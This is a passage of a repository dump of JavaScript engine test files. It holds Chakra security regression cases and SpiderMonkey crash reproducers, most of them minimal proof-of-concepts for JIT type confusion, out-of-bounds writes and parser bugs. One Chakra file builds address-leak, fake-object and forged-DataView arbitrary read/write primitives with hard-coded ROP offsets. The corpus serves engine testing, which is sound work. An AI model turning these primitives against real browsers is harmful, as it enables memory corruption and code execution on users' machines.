arr2.__proto__ = {}; 16 | arr2.reverse = Array.prototype.reverse; 17 | 18 | for (let i = 0; i < 10000; i++) { 19 | opt(arr, arr2); 20 | } 21 | 22 | Array.prototype.sort.call(arr, () => { 23 | arr2.__proto__.__proto__ = arr; 24 | }); 25 | 26 | opt(arr, arr2); 27 | print(arr[0]); 28 | } 29 | 30 | main(); 31 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/985f48051362afc734104de86dc2ad30.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var str = "+".repeat(0x80000000); 4 | str = str.replace(str, "+"); 5 | 6 | WScript.Echo("FAIL: Was expecting Out of Memory exception."); 7 | } 8 | catch (e) 9 | { 10 | if(e.number == -2146828281) //Out of Memory 11 | WScript.Echo("PASS"); 12 | else 13 | WScript.Echo("FAIL: Got the wrong exception code."); 14 | } 15 | 16 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/9ac27263931b67f5b312cb0ea1e5f111.js: -------------------------------------------------------------------------------- 1 | function asmModule() { 2 | 'use asm'; 3 | 4 | let a = [1, 2, 3, 4]; 5 | for (let i = 0; i < 0x100000; i++) { // JIT 6 | a[0] = 1; 7 | if (i === 0x30000) { 8 | a[0] = {}; // the array type changed, bailout!! 9 | } 10 | } 11 | 12 | function f(v) { 13 | v = v | 0; 14 | return v | 0; 15 | } 16 | return f; 17 | } 18 | 19 | asmModule(1); 20 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/a561aef2104a059f827616b3c380ec01.js: -------------------------------------------------------------------------------- 1 | var aiAllocationSizes = [ // max address ------. .---- RAM allocated 2 | -0x4000, // 4000 4000 4000 3 | 0x1000, // | 1000 5000 5000 4 | -0x5000, // -4000 | 5000 a000 6000 5 | 0x5000, // | | 5000 f000 b000 6 | -0x7000, // | -5000 | 7000 16000 d000 7 | 0x6000, // | | | 6000 1c000 13000 8 | -0x8000, // | | -7000 | 8000 24000 14000 (5.3Gb) 9 | ]; 10 | var aoHeap = [], 11 | oToBeFreed; 12 | aiAllocationSizes.forEach(function (iAllocationSize) { 13 | if (iAllocationSize < 0 && oToBeFreed) { 14 | console.log("-0x" + oToBeFreed.byteLength.toString(16)); 15 | oToBeFreed = null; // Free the heap block that was queued to be freed. 16 | CollectGarbage(); 17 | } 18 | var uAllocationSize = Math.abs(iAllocationSize) * 0x10000 - 1; 19 | console.log("+0x" + uAllocationSize.toString(16)); 20 | var oArrayBuffer = new ArrayBuffer(uAllocationSize); 21 | if (iAllocationSize < 0) { 22 | oToBeFreed = oArrayBuffer; // Schedule this to be freed 23 | } else { 24 | //ao­Heap.push(o­Array­Buffer); 25 | } 26 | }); 27 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/a7f12d3bca479ac7b9e29e2235cf1828.js: -------------------------------------------------------------------------------- 1 | const simpleAsmDef = ` 2 | function x(v) { 3 | v = v | 0; 4 | return v | 0; 5 | } 6 | return x;`; 7 | WScript.LoadModule(` 8 | function AsmDefaultExport() { 9 | "use asm" 10 | ${simpleAsmDef} 11 | }`) -------------------------------------------------------------------------------- /js_tests/Chakra/security/a9d195d1a9721dd849c6a0541c4f2f90.js: -------------------------------------------------------------------------------- 1 | function inlinee() { 2 | return inlinee.arguments[0]; 3 | } 4 | 5 | function opt(convert_to_var_array) { 6 | /* 7 | To make the in-place type conversion happen, it requires to segment. 8 | */ 9 | 10 | let stack_arr = []; // JavascriptNativeFloatArray 11 | stack_arr[10000] = 1.1; 12 | stack_arr[20000] = 2.2; 13 | 14 | let heap_arr = inlinee(stack_arr); 15 | convert_to_var_array(heap_arr); 16 | 17 | stack_arr[10000] = 2.3023e-320; 18 | 19 | return heap_arr[10000]; 20 | } 21 | 22 | function main() { 23 | for (let i = 0; i < 10000; i++) { 24 | opt(new Function('')); // Prevents to be inlined 25 | } 26 | 27 | print(opt(heap_arr => { 28 | heap_arr[10000] = {}; // ConvertToVarArray 29 | })); 30 | } 31 | 32 | main(); 33 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/aaf333c29f4a1442131a594f9f204a42.js: -------------------------------------------------------------------------------- 1 | function asm() { 2 | "use asm" 3 | function f(a, b) { 4 | a = a|0; 5 | b = b|0; 6 | return a|0; 7 | } 8 | return f; 9 | } 10 | 11 | eval = asm(); 12 | eval("some string"); 13 | print("PASSED"); 14 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/b5225c1dddbb6c2a0113fa418280e4ab.js: -------------------------------------------------------------------------------- 1 | const txt = ` 2 | return function() { 3 | "use asm"; 4 | function foo() { 5 | ${Array(50000).fill().map((_, i) => `var l${i} = 0.0;`).join("\n")} 6 | } 7 | return foo; 8 | } 9 | `; 10 | const asmModule = (new Function(txt))(); 11 | const asmFn = asmModule(); 12 | asmFn(); 13 | print("PASSED"); 14 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/b67a85cc8c0acb333181aff1e12faec7.js: -------------------------------------------------------------------------------- 1 | let arr = new Uint32Array(1000); 2 | for (let i = 0; i < 0x1000000; i++) { 3 | for (let j = 0; j < 1; j++) { 4 | i--; 5 | i++; 6 | } 7 | 8 | arr[i] = 0x1234; 9 | } 10 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/bc41cfc331cf7eecc4b0c996a73d4269.js: -------------------------------------------------------------------------------- 1 | evaluate = WScript.LoadScript; 2 | 3 | __defineSetter__("x", function () { }); 4 | 5 | evaluate(` 6 | let x = 'let'; 7 | Object.defineProperty(this, "x", { value: 8 | 0xdec0 }) 9 | if (x === 'let' && this.x === 57024) 10 | { 11 | WScript.Echo('pass'); 12 | } 13 | `); 14 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/beaf6c54560546a72f1e56e2815b1622.js: -------------------------------------------------------------------------------- 1 | let f = new Function("console.log(arguments[300]);"); 2 | let a = [1,2,3]; 3 | let b = []; 4 | b.length = 1000; 5 | b.fill(2); 6 | 7 | let p = new Proxy([], { 8 | get: function (oTarget, sKey) { 9 | console.log("get"); 10 | a.length = 4; // Make a hole 11 | return oTarget[sKey] || 0 || undefined; 12 | }, 13 | }); 14 | b.__proto__ = p; 15 | 16 | let proto = []; 17 | Object.defineProperty(proto, 3, {get: function() { 18 | console.log("hi") 19 | b.length = 1; 20 | return 4; 21 | }}); 22 | a.__proto__ = proto; 23 | 24 | f(1, ...a, ...b); 25 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/c6a9be9876a9b2673b5ee6a17202e6d8.js: -------------------------------------------------------------------------------- 1 | function opt(a, b, v) { 2 | if (b.length < 1) 3 | return; 4 | 5 | for (let i = 0; i < a.length; i++) 6 | a[i] = v; 7 | 8 | b[0] = 2.3023e-320; 9 | } 10 | 11 | function main() { 12 | for (let i = 0; i < 1000; i++) { 13 | opt(new Uint8Array(100), [1.1, 2.2, 3.3], {}); 14 | } 15 | 16 | let a = new Uint8Array(100); 17 | let b = [1.1, 2.2, 3.3]; 18 | opt(a, b, { 19 | valueOf: () => { 20 | b[0] = {}; 21 | return 0; 22 | } 23 | }); 24 | 25 | print(b[0]); 26 | } 27 | 28 | main(); 29 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/ca5987191d5b895070a79c5a1aaf2470.js: -------------------------------------------------------------------------------- 1 | class MyClass { 2 | constructor() { 3 | this.arr = [1, 2, 3]; 4 | } 5 | 6 | f() { 7 | super.arr = [1]; 8 | this.x; 9 | } 10 | } 11 | 12 | let c = new MyClass(); 13 | for (let i = 0; i < 0x10000; i++) { 14 | c.f(); 15 | } 16 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/cbd84e3e234e22ef7b0094199b3cb981.js: -------------------------------------------------------------------------------- 1 | function opt(arr, start, end) { 2 | for (let i = start; i < end; i++) { 3 | if (i === 10) { 4 | i += 0; 5 | } 6 | arr[i] = 2.3023e-320; 7 | } 8 | } 9 | 10 | let arr = new Array(100); 11 | 12 | function main() { 13 | arr.fill(1.1); 14 | 15 | for (let i = 0; i < 1000; i++) 16 | opt(arr, 0, 3); 17 | 18 | opt(arr, 0, 100000); 19 | } 20 | 21 | main(); 22 | 23 | WScript.Echo(arr[0] === 2.3023e-320 ? 'pass' : 'fail'); 24 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/d95c5363ab3fc946aa8a04373e201ff5.js: -------------------------------------------------------------------------------- 1 | function f() { 2 | print(arguments); 3 | } 4 | 5 | let call = new Proxy(Function.prototype.call, {}); // proxy calls set the flag 6 | call.call(f); 7 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/dd7d0cfc151f57112b3240a1949e5398.js: -------------------------------------------------------------------------------- 1 | function main() { 2 | let arr = [1.1, 1.1, 1.1, 1.1, 1.1]; 3 | function opt(f) { 4 | arr[0] = 1.1; 5 | arr[1] = 2.3023e-320 + parseInt('a'.replace('a', f)); 6 | arr[2] = 1.1; 7 | arr[3] = 1.1; 8 | } 9 | 10 | let r0 = () => '0'; 11 | for (var i = 0; i < 0x1000; i++) 12 | opt(r0); 13 | 14 | opt(() => { 15 | arr[0] = {}; 16 | return '0'; 17 | }); 18 | 19 | print(arr[1]); 20 | } 21 | 22 | main(); 23 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/e01b1b82903ad11b2854068c7492ef7c.js: -------------------------------------------------------------------------------- 1 | const kNumProperties = 100; 2 | 3 | let o = {}; 4 | for (let i = 0; i < kNumProperties; ++i) 5 | o['a' + i] = i; 6 | 7 | Object.preventExtensions(o); // IsNotExtensibleSupported && !this->VerifyIsExtensible 8 | 9 | for (let i = 0; i < kNumProperties; ++i) 10 | delete o['a' + i]; 11 | 12 | for (let i = 0; i < 0x1000; ++i) 13 | o['a0'] = 1; // calling TryUndeleteProperty again again 14 | 15 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/e1be402ec4171d5189b7818c653696a3.js: -------------------------------------------------------------------------------- 1 | var evil_array = new Array(0x38/*dataview type id*/,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0); 2 | g_lo = 0; 3 | g_hi = 0; 4 | var b = [1.1,2.2]; 5 | dv = new DataView(new ArrayBuffer(8)); 6 | 7 | var vt_to_chakrabase = 0x592d88; 8 | var chakrabase_to_threadCtxPtr = 0x735eb0; 9 | var chakrabase_to_retPtr = 0x1ca99d; 10 | var chakrabase_to_rop = 0x1028e5; 11 | var chakrabase_to_vp = 0x1028bb; 12 | 13 | function read_obj_address(a,gg,c,d){ 14 | a[0] = 1.2; 15 | try{gg[d] = c} catch(e) {} 16 | a[1] = 2.2; 17 | return a[0]; 18 | } 19 | 20 | function float_to_uint(num){ 21 | f = new Float64Array(1); 22 | f[0] = num; 23 | uint = new Uint32Array(f.buffer); 24 | return uint[1] * 0x100000000 + uint[0]; 25 | } 26 | function uint_to_float(lo,hi){ 27 | u = new Uint32Array(2); 28 | u[0] = lo; 29 | u[1] = hi; 30 | g_lo = u[0]; 31 | g_hi = u[1]; 32 | f = new Float64Array(u.buffer); 33 | return f[0]; 34 | } 35 | function fake_dataview(lo,hi){ 36 | int_lo = lo > 0x80000000? -(0x100000000-lo):lo; 37 | evil_array[0] = 0x38; 38 | evil_array[1] = 0; 39 | 40 | evil_array[2] = int_lo; 41 | evil_array[3] = hi; 42 | 43 | evil_array[4] = 0; 44 | evil_array[5] = 0; 45 | evil_array[6] = 0; 46 | evil_array[7] = 0; 47 | 48 | evil_array[8] = 0x200; 49 | 50 | evil_array[9] = 0; 51 | 52 | evil_array[10] = int_lo - 0x38; 53 | evil_array[11] = hi; 54 | 55 | evil_array[12] = 0; 56 | evil_array[13] = 0; 57 | 58 | //alert(evil_array[8].toString(16)) 59 | evil_array[14] = 0x41414141; 60 | evil_array[15] = 0x42424242; 61 | //Array.prototype.slice.call(evil_array); 62 | } 63 | function Read32(addr){ 64 | evil_array[14] = addr & 0xffffffff; 65 | evil_array[15] = Math.floor(addr / 0x100000000); 66 | return dv.getUint32.call(evil_dv,0,true); 67 | } 68 | function Write32(addr,data){ 69 | evil_array[14] = addr & 0xffffffff; 70 | evil_array[15] = Math.floor(addr / 0x100000000); 71 | dv.setUint32.call(evil_dv,0,data,true); 72 | } 73 | function Read64(addr){ 74 | evil_array[14] = addr & 0xffffffff; 75 | evil_array[15] = Math.floor(addr / 0x100000000); 76 | result = dv.getUint32.call(evil_dv,0,true) + dv.getUint32.call(evil_dv,4,true) * 0x100000000; 77 | return result; 78 | } 79 | function Write64(addr,data_lo,data_hi){ 80 | evil_array[14] = addr & 0xffffffff; 81 | evil_array[15] = Math.floor(addr / 0x100000000); 82 | dv.setUint32.call(evil_dv,0,data_lo,true); 83 | dv.setUint32.call(evil_dv,4,data_hi,true); 84 | } 85 | function main(){ 86 | var a =[1.1,2.2]; 87 | var gg = new Float64Array(100); 88 | for(var i = 0;i < 0x10000;i++){ 89 | read_obj_address(a,gg,1.1+i,4); 90 | } 91 | evil = {valueOf: () => { 92 | a[0] = evil_array; //leak any object address 93 | return 0; 94 | }} 95 | 96 | evil_array_slots_address = float_to_uint(read_obj_address(a,gg,evil,4))+0x58; 97 | 98 | var fake_obj_address = uint_to_float(evil_array_slots_address & 0xffffffff,Math.floor(evil_array_slots_address / 0x100000000)).toString(); 99 | var fake_obj_str = "function fake_obj(b,gg,c,d){b[0] = 1.333;try{gg[d] = c} catch(e) {};b[1] = 2.22222222;b[0] = " + fake_obj_address +";}"; 100 | eval(fake_obj_str); 101 | 102 | 103 | for(var i = 0;i < 0x10000;i++){ 104 | fake_obj(b,gg,1.1+i,4); 105 | } 106 | evil2 = {valueOf: () => { 107 | b[0] = {}; 108 | return 0; 109 | }} 110 | fake_dataview(g_lo,g_hi); 111 | fake_obj(b,gg,evil2,4); 112 | evil_dv = b[0]; 113 | } 114 | main(); 115 | 116 | WScript.Echo('pass'); 117 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/e3564896b49307c9a441d0d49c9f8605.js: -------------------------------------------------------------------------------- 1 | function func() { 2 | new.target.x; 3 | } 4 | 5 | let bound = func.bind({}, 1); 6 | 7 | Reflect.construct(bound, []); 8 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/e6384df98b3404c2189ac3dde0fc1c2c.js: -------------------------------------------------------------------------------- 1 | function opt(arr, index) { 2 | arr[0] = 1.1; 3 | typeof(arr[index]); 4 | arr[0] = 2.3023e-320; 5 | } 6 | 7 | function main() { 8 | let arr = [1.1, 2.2, 3.3]; 9 | for (let i = 0; i < 0x10000; i++) { 10 | opt(arr, {}); 11 | } 12 | 13 | opt(arr, {toString: () => { 14 | arr[0] = {}; 15 | 16 | throw 1; 17 | }}); 18 | 19 | print(arr[0]); 20 | } 21 | 22 | main(); 23 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/e6f31fb4256ca9a24e864dedd5a62cac.js: -------------------------------------------------------------------------------- 1 | function opt() { 2 | let obj = new Number(2.3023e-320); 3 | for (let i = 0; i < 1; i++) { 4 | obj.x = 1; 5 | obj = +obj; 6 | obj.x = 1; 7 | } 8 | } 9 | 10 | function main() { 11 | for (let i = 0; i < 100; i++) { 12 | opt(); 13 | } 14 | } 15 | 16 | main(); 17 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/ec1035e67ad58dfb3f2ba95948f1e835.js: -------------------------------------------------------------------------------- 1 | function f() { 2 | ({ 3 | a: { 4 | b = 0x1111, 5 | c = 0x2222, 6 | }.c = 0x3333 7 | } = {}); 8 | } 9 | 10 | f(); 11 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/ed903469a4c2669eb1988d8d169b4979.js: -------------------------------------------------------------------------------- 1 | function opt(arr, idx) { 2 | ((arr.length === 0x7ffffff0 && arr[0x7ffffff0]) || false) && (arr.length === 0x7ffffff0 && arr[0x7ffffff1]) || (arr[0x11111111] = 0x1234); 3 | } 4 | 5 | function main() { 6 | let arr = new Uint32Array(1); 7 | for (let i = 0; i < 10000; i++) { 8 | opt(arr); 9 | } 10 | } 11 | 12 | main(); 13 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/f580a47df2636db8b775af39e5946ad9.js: -------------------------------------------------------------------------------- 1 | function f() { 2 | arguments; 3 | WScript.Echo('pass'); 4 | } 5 | 6 | let call = new Proxy(Function.prototype.call, {}); // proxy calls set the flag 7 | call.call(f); -------------------------------------------------------------------------------- /js_tests/Chakra/security/f58a108fc5ad573a720ba57e8d909cda.js: -------------------------------------------------------------------------------- 1 | function f(x) { 2 | arguments; 3 | 4 | { 5 | function x() { 6 | } 7 | } 8 | } 9 | 10 | for (let i = 0; i < 10000; i++) 11 | f(); 12 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/fa0c5c5e8092767fea631464ab7f8c65.js: -------------------------------------------------------------------------------- 1 | let h = function f(a0 = (function () { 2 | a0; 3 | a1; 4 | a2; 5 | a3; 6 | a4; 7 | a5; 8 | a6; 9 | a7 = 0x99999; // oob write 10 | 11 | with ({}); 12 | })(), a1, a2, a3, a4, a5, a6, a7) { 13 | function g() { 14 | f; 15 | } 16 | }; 17 | 18 | for (let i = 0; i < 0x10000; i++) { 19 | h(); 20 | } 21 | 22 | WScript.Echo('pass'); 23 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/ff2b0316d75e3ea3b5d4d9d610409bfa.js: -------------------------------------------------------------------------------- 1 | function opt() { 2 | let tmp = []; 3 | tmp[0] = tmp; 4 | return tmp[0]; 5 | } 6 | 7 | function main() { 8 | for (let i = 0; i < 0x1000; i++) { 9 | opt(); 10 | } 11 | 12 | print(opt()); // deref uninitialized stack pointers! 13 | } 14 | 15 | main(); 16 | -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/010f477e412079d01f4788d353626c80.js: -------------------------------------------------------------------------------- 1 | Reflect.construct(Function.prototype.bind.call(new Proxy(Array,{})), [1,2,3,4,5,6,7,8,9,10,11,12,13]) 2 | -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/0188d787b6c6861b3de9c3fea4afc018.js: -------------------------------------------------------------------------------- 1 | x = Object 2 | try { 3 | (function() { 4 | "use strict"; 5 | eval("\ 6 | Object.toSource = (function() {\ 7 | \"use asm\";\ 8 | function f() {}\ 9 | return f\ 10 | })\ 11 | ") 12 | })() 13 | } catch (e) {} 14 | print(uneval(x)) 15 | -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/03754208ba0caa659f6d8e6e62ecf9bb.js: -------------------------------------------------------------------------------- 1 | function _wasmFullPassInternal(assertValueFunc, text, expected, maybeImports, ...args) { 2 | let binary = wasmTextToBinary(text); 3 | let retext = wasmBinaryToText(binary); 4 | assertValueFunc(reinstance.exports.run(...args), expected, "Reformed module must return the expected result"); 5 | } 6 | function wasmFullPass(text, expected, maybeImports, ...args) { 7 | _wasmFullPassInternal(assertEq, text, expected, maybeImports, ...args); 8 | } 9 | var lfLogBuffer = ` 10 | wasmFullPass('(module (func (result f32) (f32.const -1)) (export "run" 0))', -1); 11 | `; 12 | loadFile(lfLogBuffer); 13 | loadFile(lfLogBuffer); 14 | function loadFile(lfVarx) { 15 | try { 16 | oomTest(function() { 17 | eval(lfVarx); 18 | }); 19 | } catch (lfVare) {} 20 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/038c795b68595d0612efa6dc8f505f03.js: -------------------------------------------------------------------------------- 1 | b = {}; 2 | b.__proto__ = evalcx(("new Date('1/1/1999 13:30 PM')")); 3 | function g() { 4 | g(b.toString()) 5 | } 6 | g(); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/093f3bad6a07bc3288dce7ab28d1cd65.js: -------------------------------------------------------------------------------- 1 | 2 | delete Object.prototype.__proto__; 3 | var int32x4 = SIMD.int32x4; 4 | var Array = int32x4.array(1); 5 | var array = new Array([int32x4(1, 2, 3, 4)]); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/0945eac4569d1e87dcb7cb72c769fb48.js: -------------------------------------------------------------------------------- 1 | function TestCase(n, d, e, a) 2 | this.type = (typeof window == 'undefined' ? 'shell' : 'browser'); 3 | var SECTION = "11.9.2"; 4 | new TestCase(SECTION, "void 0 == void 0", false, void 0 != void 0); 5 | new TestCase(SECTION, "null == null", false, null != null); 6 | new TestCase(SECTION, "NaN != NaN", true, Number.NaN != Number.NaN); 7 | new TestCase(SECTION, "NaN != 0", true, "while (1"); 8 | new TestCase(SECTION, "0 != NaN", true, 0 != Number.NaN); 9 | new TestCase(SECTION, "NaN != Infinity", true, Number.NaN != Number.POSITIVE_INFINITY); 10 | new TestCase(SECTION, "Infinity != NaN", true, Number.POSITIVE_INFINITY != Number.NaN); 11 | new TestCase(SECTION, "Number.MAX_VALUE != Number.MAX_VALUE", false, Number.MAX_VALUE != Number.MAX_VALUE); 12 | new TestCase(SECTION, "Number.MIN_VALUE != Number.MIN_VALUE", false, Number.MIN_VALUE != Number.MIN_VALUE); 13 | new TestCase(SECTION, "Number.POSITIVE_INFINITY != Number.POSITIVE_INFINITY", false, Number.POSITIVE_INFINITY != Number.POSITIVE_INFINITY); 14 | new TestCase(SECTION, "Number.NEGATIVE_INFINITY != Number.NEGATIVE_INFINITY", false, Number.NEGATIVE_INFINITY != Number.NEGATIVE_INFINITY); 15 | new TestCase(SECTION, "0 != 0", false, 0 != 0); 16 | new TestCase(SECTION, "0 != -0", false, 0 != -0); 17 | new TestCase(SECTION, "-0 != 0", false, -0 != 0); 18 | new TestCase(SECTION, "-0 != -0", false, -0 != -0); 19 | new TestCase(SECTION, "0.9 != 1", true, 0.9 != 1); 20 | new TestCase(SECTION, "0.999999 != 1", true, 0.999999 != 1); 21 | oomAfterAllocations(5); 22 | new TestCase(SECTION, "0.9999999999999 != 1", true, 0.9999999999999 != 1); 23 | new TestCase(SECTION, "true != true", false, true != true); 24 | new TestCase(SECTION, "false != false", false, false != false); 25 | new TestCase(SECTION, "true != false", true, true != false); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/0bfa96b1338e54a3e12ccbabf04f39b7.js: -------------------------------------------------------------------------------- 1 | var g = newGlobal(); 2 | var dbg = new Debugger(g); 3 | function test(type, provocation) { 4 | dbg.onEnterFrame = function handleFirstFrame(f) { 5 | assertEq(f.eval(provocation), null); 6 | }; 7 | assertEq(typeof g.eval('eval'), 'function'); 8 | } 9 | g.eval("async function f() { await 3; }"); 10 | test('call', 'f();'); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/14c31db39203a4a6a3ea147723c9304c.js: -------------------------------------------------------------------------------- 1 | 2 | test = (function () { 3 | function f() { 4 | [1,2,3,4,5]; 5 | }; 6 | return "var obj = { x : 2 };" + f.toSource() + "; f()"; 7 | })(); 8 | evalWithCache(test, {}); 9 | function evalWithCache(code, ctx) { 10 | code = cacheEntry(code); 11 | ctx.compileAndGo = true; 12 | var res1 = evaluate(code, Object.create(ctx, {saveBytecode: { value: true } })); 13 | var res2 = evaluate(code, Object.create(ctx, {loadBytecode: { value: true }, saveBytecode: { value: true } })); 14 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/185776b5975e22285914c19a72cc466a.js: -------------------------------------------------------------------------------- 1 | (function() { 2 | const[arguments] = 0 3 | })() -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/1943f20370550cf2cc534c12df4bf243.js: -------------------------------------------------------------------------------- 1 | var lfcode = new Array(); 2 | lfcode.push = loadFile; 3 | setJitCompilerOption("ion.warmup.trigger", 20); 4 | lfcode.push(` 5 | function heavyFn1(i) { 6 | if (i == 3) 7 | return [ "isFinite"].map(function (i) {}); 8 | return []; 9 | } 10 | for (var i = 0; oomAfterAllocations(50); i++) 11 | heavyFn1(i); 12 | `); 13 | function loadFile(lfVarx) { 14 | var lfGlobal = newGlobal(); 15 | lfGlobal.offThreadCompileScript(lfVarx); 16 | lfGlobal.runOffThreadScript(); 17 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/23daaf120528d50be656133ae536ef3c.js: -------------------------------------------------------------------------------- 1 | function f() 2 | yield 3 | /x/ -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/29e612e3531c8d8fb14ef378e7e9041f.js: -------------------------------------------------------------------------------- 1 | eval("(function() { class a { constructor() { } static });"); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/2ef177f6ccd0b714ac76a0d75ef70f63.js: -------------------------------------------------------------------------------- 1 | (function(){}); 2 | (function(){}); 3 | (function(){}); 4 | (function(){}); 5 | (function(){}); 6 | (function(){}); 7 | (function(){}); 8 | (function(){}); 9 | (function(){}); 10 | (function(){}); 11 | (function(){}); 12 | (function(){}); 13 | (function(){}); 14 | (function(){}); 15 | (function(){}); 16 | (function(){}); 17 | (function(){}); 18 | (function(){}); 19 | (function(){}); 20 | (function(){}); 21 | (function(){}); 22 | (function(){}); 23 | (function(){}); 24 | (function(){}); 25 | (function(){}); 26 | (function(){}); 27 | (function(){}); 28 | (function(){}); 29 | (function(){}); 30 | (function(){}); 31 | (function(){}); 32 | (function(){}); 33 | (function(){}); 34 | (function(){}); 35 | (function(){}); 36 | (function(){}); 37 | (function(){}); 38 | (function(){}); 39 | (function(){}); 40 | (function(){}); 41 | (function(){}); 42 | (function(){}); 43 | (function(){}); 44 | (function(){}); 45 | (function(){}); 46 | (function(){}); 47 | (function(){}); 48 | (function(){}); 49 | (function(){}); 50 | (function(){}); 51 | (function(){}); 52 | (function(){}); 53 | (function(){}); 54 | (function(){}); 55 | (function(){}); 56 | (function(){}); 57 | (function(){}); 58 | (function(){}); 59 | evaluate("function f(){\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n",({ 60 | fileName: null, 61 | lineNumber: 42, 62 | compileAndGo: 9 63 | })) -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/34634184bee8d9f71be27450baf1717e.js: -------------------------------------------------------------------------------- 1 | 2 | var g = newGlobal(); 3 | var dbg = new Debugger(g); 4 | dbg.onNewScript = function(script) { 5 | fscript = script.getChildScripts()[0]; 6 | } 7 | g.eval("function f(x) { arguments[0] = 3; return x }"); 8 | fscript.setBreakpoint(0, {hit:function(frame) { 9 | assertEq(frame.arguments[0], (2)); 10 | }}); 11 | g.f(1); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/37b7ea2826aa3b81ddc9540a350b7af1.js: -------------------------------------------------------------------------------- 1 | for (var j = 0; j < 99; j++) { 2 | Array[{ 3 | f() { 4 | eval() 5 | } 6 | }]; 7 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/387eb5422fd74824e4daeb043cf37bae.js: -------------------------------------------------------------------------------- 1 | parseModule(` 2 | export * from './t.js'; 3 | export let foo; 4 | `); 5 | -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/397a188b727909733912c8eed664d6c5.js: -------------------------------------------------------------------------------- 1 | for each(var x in [{n: 1}, {n: 1}, {n: 1}, {n: 1}, {n: 1}, {n: 1}, {n: 1}, 2 | {n: 1}, {n: 1}, {n: 1}, {n: 1}, {n: 1}, {n: 1}, {n: 1}, 3 | {n: 1}, {n: 1}, {n: 1}, {n: 1}, {n: 1}, {n: 1}]) { 4 | x[0] = 0; 5 | Object.freeze(x); 6 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/3c181e661cc116572e8b05bbbb22decf.js: -------------------------------------------------------------------------------- 1 | var lfcode = new Array(); 2 | var lfRunTypeId = -1; 3 | lfcode.push = loadFile; 4 | oomAfterAllocations(10, 2); 5 | lfcode.push(` 6 | function mod(stdlib, ffi, heap) { 7 | "use asm"; 8 | function f3(k) { 9 | k = k | 0; 10 | } 11 | function g3(k) {} 12 | `); 13 | function loadFile(lfVarx) { 14 | switch (lfRunTypeId) { 15 | default: evaluate(lfVarx, { 16 | }); 17 | } 18 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/3c801c3fc0d6a3475796749caa5f80a9.js: -------------------------------------------------------------------------------- 1 | function parseAsModule(source) { 2 | return Reflect.parse(source, { 3 | target: "module", 4 | }); 5 | } 6 | parseAsModule('function f() {} //@ sourceMappingURL=http://example.com/foo.js.map', {}); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/3cc7ef212af0c53a795add2d7ea603a5.js: -------------------------------------------------------------------------------- 1 | 2 | if (...z) => -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/4020c54f061b22f5f78317480c8298ae.js: -------------------------------------------------------------------------------- 1 | 2 | var sym = Symbol.for("hello"); 3 | assertEq(sym in environment, true); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/413cf350542ab889f19ac5427514da57.js: -------------------------------------------------------------------------------- 1 | 2 | do { 3 | [] 4 | } while (x) / -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/41df61053734d07032a4e6f443e65408.js: -------------------------------------------------------------------------------- 1 | oomTest(() => { 2 | offThreadCompileScript(` 3 | "use asm"; 4 | return assertEq; 5 | `); 6 | runOffThreadScript(); 7 | }); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/454e1d9ba5ee230e34f9d3e546abbbb0.js: -------------------------------------------------------------------------------- 1 | oomAfterAllocations(50); 2 | function f1() { 3 | var v; 4 | }; 5 | dis(f1); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/47a595b0f3da72ef136e5c22f2a4ba78.js: -------------------------------------------------------------------------------- 1 | var o13 = Array; 2 | function f5(o) { 3 | ox1 = new Proxy(o, {}); 4 | } 5 | f5(o13); 6 | new ox1(1, 2); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/47a98ed63c8e444320edc50ba846e3c7.js: -------------------------------------------------------------------------------- 1 | evalInWorker(` 2 | function f() { f(); } 3 | evalInWorker('#3: myObj.p1 === "a". Actual: myObj.p1 ===' + f.caller ); 4 | `); -------------------------------------------------------------------------------- 